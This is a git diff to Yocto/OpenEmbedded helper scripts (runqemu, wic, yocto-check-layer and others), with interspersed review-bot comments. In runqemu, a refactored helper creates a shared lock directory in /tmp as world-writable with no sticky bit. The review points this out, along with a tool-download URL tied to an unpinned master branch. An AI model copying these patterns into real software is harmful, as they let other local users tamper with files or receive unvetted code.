% (elf_file_name, p_memsz, len(new_dl_path) + 1))
- break
+ return False
dl_path = new_dl_path + b("\0") * (p_filesz - len(new_dl_path))
f.seek(p_offset)
f.write(dl_path)
break
+ return True
def change_dl_sysdirs(elf_file_name):
if arch == 32:
@@ -215,6 +216,7 @@ else:
executables_list = sys.argv[3:]
+errors = False
for e in executables_list:
perms = os.stat(e)[stat.ST_MODE]
if os.access(e, os.W_OK|os.R_OK):
@@ -240,7 +242,8 @@ for e in executables_list:
arch = get_arch()
if arch:
parse_elf_header()
- change_interpreter(e)
+ if not change_interpreter(e):
+ errors = True
change_dl_sysdirs(e)
""" change permissions back """
@@ -253,3 +256,6 @@ for e in executables_list:
print("New file size for %s is different. Looks like a relocation error!", e)
sys.exit(-1)
+if errors:
+ print("Relocation of one or more executables failed.")
+ sys.exit(-1)
diff --git a/scripts/runqemu b/scripts/runqemu
index cc87ea871a..4dfc0e2d38 100755
--- a/scripts/runqemu
+++ b/scripts/runqemu
@@ -764,7 +764,7 @@ class BaseConfig(object):
raise RunQemuError('BIOS not found: %s' % bios_match_name)
if not os.path.exists(self.bios):
- raise RunQemuError("KERNEL %s not found" % self.bios)
+ raise RunQemuError("BIOS %s not found" % self.bios)
def check_mem(self):
@@ -974,17 +974,14 @@ class BaseConfig(object):
else:
self.nfs_server = '192.168.7.1'
- # Figure out a new nfs_instance to allow multiple qemus running.
- ps = subprocess.check_output(("ps", "auxww")).decode('utf-8')
- pattern = '/bin/unfsd .* -i .*\.pid -e .*/exports([0-9]+) '
- all_instances = re.findall(pattern, ps, re.M)
- if all_instances:
- all_instances.sort(key=int)
- self.nfs_instance = int(all_instances.pop()) + 1
-
- nfsd_port = 3049 + 2 * self.nfs_instance
- mountd_port = 3048 + 2 * self.nfs_instance
+ nfsd_port = 3048 + self.nfs_instance
+ lockdir = "/tmp/qemu-port-locks"
+ self.make_lock_dir(lockdir)
+ while not self.check_free_port('localhost', nfsd_port, lockdir):
+ self.nfs_instance += 1
+ nfsd_port += 1
+ mountd_port = nfsd_port
# Export vars for runqemu-export-rootfs
export_dict = {
'NFS_INSTANCE': self.nfs_instance,
@@ -1034,6 +1031,17 @@ class BaseConfig(object):
self.set('NETWORK_CMD', '-netdev bridge,br=%s,id=net0,helper=%s -device virtio-net-pci,netdev=net0 ' % (
self.net_bridge, os.path.join(self.bindir_native, 'qemu-oe-bridge-helper')))
+ def make_lock_dir(self, lockdir):
+ if not os.path.exists(lockdir):
+ # There might be a race issue when multi runqemu processess are
+ # running at the same time.
+ try:
+ os.mkdir(lockdir)
+ os.chmod(lockdir, 0o777)
+ except FileExistsError:
+ pass
+ return
+
def setup_slirp(self):
"""Setup user networking"""
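Review bot: `make_lock_dir` creates `/tmp/qemu-port-locks` with mode `0o777`, world-writable without the sticky bit, so any local user can remove or replace lock files that another user's runqemu created there, and a directory pre-created by someone else is accepted as is. If the directory has to be shared between users, `os.chmod(lockdir, 0o1777)` at least restricts deletion to each file's owner; a per-user lock directory would avoid the sharing altogether. The trailing bare `return` can be dropped, and the method would benefit from a one-line docstring stating who is expected to share the directory. The code was moved here from two call sites, so the behaviour predates this commit.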
@@ -1052,14 +1060,7 @@ class BaseConfig(object):
mac = 2
lockdir = "/tmp/qemu-port-locks"
- if not os.path.exists(lockdir):
- # There might be a race issue when multi runqemu processess are
- # running at the same time.
- try:
- os.mkdir(lockdir)
- os.chmod(lockdir, 0o777)
- except FileExistsError:
- pass
+ self.make_lock_dir(lockdir)
# Find a free port to avoid conflicts
for p in ports[:]:
@@ -1099,14 +1100,7 @@ class BaseConfig(object):
logger.error("ip: %s" % ip)
raise OEPathError("runqemu-ifup, runqemu-ifdown or ip not found")
- if not os.path.exists(lockdir):
- # There might be a race issue when multi runqemu processess are
- # running at the same time.
- try:
- os.mkdir(lockdir)
- os.chmod(lockdir, 0o777)
- except FileExistsError:
- pass
+ self.make_lock_dir(lockdir)
cmd = (ip, 'link')
logger.debug('Running %s...' % str(cmd))
@@ -1328,6 +1322,8 @@ class BaseConfig(object):
for ovmf in self.ovmf_bios:
format = ovmf.rsplit('.', 1)[-1]
+ if format == "bin":
+ format = "raw"
self.qemu_opt += ' -drive if=pflash,format=%s,file=%s' % (format, ovmf)
self.qemu_opt += ' ' + self.qemu_opt_script
@@ -1421,13 +1417,13 @@ class BaseConfig(object):
logger.debug('Running %s' % str(cmd))
subprocess.check_call(cmd)
self.release_taplock()
- self.release_portlock()
if self.nfs_running:
logger.info("Shutting down the userspace NFS server...")
cmd = ("runqemu-export-rootfs", "stop", self.rootfs)
logger.debug('Running %s' % str(cmd))
subprocess.check_call(cmd)
+ self.release_portlock()
if self.saved_stty:
subprocess.check_call(("stty", self.saved_stty))
@@ -1514,7 +1510,8 @@ def main():
def sigterm_handler(signum, frame):
logger.info("SIGTERM received")
- os.kill(config.qemupid, signal.SIGTERM)
+ if config.qemupid:
+ os.kill(config.qemupid, signal.SIGTERM)
config.cleanup()
# Deliberately ignore the return code of 'tput smam'.
subprocess.call(["tput", "smam"])
diff --git a/scripts/verify-bashisms b/scripts/verify-bashisms
index fb0cc719ea..14d8c298e9 100755
--- a/scripts/verify-bashisms
+++ b/scripts/verify-bashisms
@@ -100,7 +100,7 @@ if __name__=='__main__':
args = parser.parse_args()
if shutil.which("checkbashisms.pl") is None:
- print("Cannot find checkbashisms.pl on $PATH, get it from https://anonscm.debian.org/cgit/collab-maint/devscripts.git/plain/scripts/checkbashisms.pl")
+ print("Cannot find checkbashisms.pl on $PATH, get it from https://salsa.debian.org/debian/devscripts/raw/master/scripts/checkbashisms.pl")
sys.exit(1)
# The order of defining the worker function,
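Review bot: The replacement URL in the `print(...)` message sends users to fetch an executable Perl script from the moving `master` branch of devscripts, so what ends up on `$PATH` is whatever the branch tip holds at download time. I would point the message at a tagged devscripts release instead. A short comment above the `print` recording which upstream version this script was last checked against would also help.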
diff --git a/scripts/wic b/scripts/wic
index 24700f380f..99a8a97ccb 100755
--- a/scripts/wic
+++ b/scripts/wic
@@ -22,9 +22,9 @@ import sys
import argparse
import logging
import subprocess
+import shutil
from collections import namedtuple
-from distutils import spawn
# External modules
scripts_path = os.path.dirname(os.path.realpath(__file__))
@@ -47,7 +47,7 @@ if os.environ.get('SDKTARGETSYSROOT'):
break
sdkroot = os.path.dirname(sdkroot)
-bitbake_exe = spawn.find_executable('bitbake')
+bitbake_exe = shutil.which('bitbake')
if bitbake_exe:
bitbake_path = scriptpath.add_bitbake_lib_path()
import bb
@@ -206,7 +206,7 @@ def wic_create_subcommand(options, usage_str):
logger.info(" (Please check that the build artifacts for the machine")
logger.info(" selected in local.conf actually exist and that they")
logger.info(" are the correct artifacts for the image (.wks file)).\n")
- raise WicError("The artifact that couldn't be found was %s:\n %s", not_found, not_found_dir)
+ raise WicError("The artifact that couldn't be found was %s:\n %s" % (not_found, not_found_dir))
krootfs_dir = options.rootfs_dir
if krootfs_dir is None:
@@ -312,6 +312,8 @@ def wic_init_parser_create(subparser):
subparser.add_argument("-o", "--outdir", dest="outdir", default='.',
help="name of directory to create image in")
+ subparser.add_argument("-w", "--workdir",
+ help="temporary workdir to use for intermediate files")
subparser.add_argument("-e", "--image-name", dest="image_name",
help="name of the image to use the artifacts from "
"e.g. core-image-sato")
diff --git a/scripts/yocto-check-layer b/scripts/yocto-check-layer
index b7c83c8b54..dd930cdddd 100755
--- a/scripts/yocto-check-layer
+++ b/scripts/yocto-check-layer
@@ -24,7 +24,7 @@ import scriptpath
scriptpath.add_oe_lib_path()
scriptpath.add_bitbake_lib_path()
-from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_signatures, check_bblayers
+from checklayer import LayerType, detect_layers, add_layers, add_layer_dependencies, get_layer_dependencies, get_signatures, check_bblayers
from oeqa.utils.commands import get_bb_vars
PROGNAME = 'yocto-check-layer'
@@ -51,6 +51,8 @@ def main():
help='File to output log (optional)', action='store')
parser.add_argument('--dependency', nargs="+",
help='Layers to process for dependencies', action='store')
+ parser.add_argument('--no-auto-dependency', help='Disable automatic testing of dependencies',
+ action='store_true')
parser.add_argument('--machines', nargs="+",
help='List of MACHINEs to be used during testing', action='store')
parser.add_argument('--additional-layers', nargs="+",
@@ -121,6 +123,21 @@ def main():
if not layers:
return 1
+ # Find all dependencies, and get them checked too
+ if not args.no_auto_dependency:
+ depends = []
+ for layer in layers:
+ layer_depends = get_layer_dependencies(layer, dep_layers, logger)
+ if layer_depends:
+ for d in layer_depends:
+ if d not in depends:
+ depends.append(d)
+
+ for d in depends:
+ if d not in layers:
+ logger.info("Adding %s to the list of layers to test, as a dependency", d['name'])
+ layers.append(d)
+
shutil.copyfile(bblayersconf, bblayersconf + '.backup')
def cleanup_bblayers(signum, frame):
shutil.copyfile(bblayersconf + '.backup', bblayersconf)
@@ -138,6 +155,9 @@ def main():
layer['type'] == LayerType.ERROR_BSP_DISTRO:
continue
+ # Reset to a clean backup copy for each run
+ shutil.copyfile(bblayersconf + '.backup', bblayersconf)
+
if check_bblayers(bblayersconf, layer['path'], logger):
logger.info("%s already in %s. To capture initial signatures, layer under test should not present "
"in BBLAYERS. Please remove %s from BBLAYERS." % (layer['name'], bblayersconf, layer['name']))
@@ -149,17 +169,13 @@ def main():
logger.info("Setting up for %s(%s), %s" % (layer['name'], layer['type'],
layer['path']))
- shutil.copyfile(bblayersconf + '.backup', bblayersconf)
-
missing_dependencies = not add_layer_dependencies(bblayersconf, layer, dep_layers, logger)
if not missing_dependencies:
for additional_layer in additional_layers:
if not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger):
missing_dependencies = True
break
- if not add_layer_dependencies(bblayersconf, layer, dep_layers, logger) or \
- any(map(lambda additional_layer: not add_layer_dependencies(bblayersconf, additional_layer, dep_layers, logger),
- additional_layers)):
+ if missing_dependencies:
logger.info('Skipping %s due to missing dependencies.' % layer['name'])
results[layer['name']] = None
results_status[layer['name']] = 'SKIPPED (Missing dependencies)'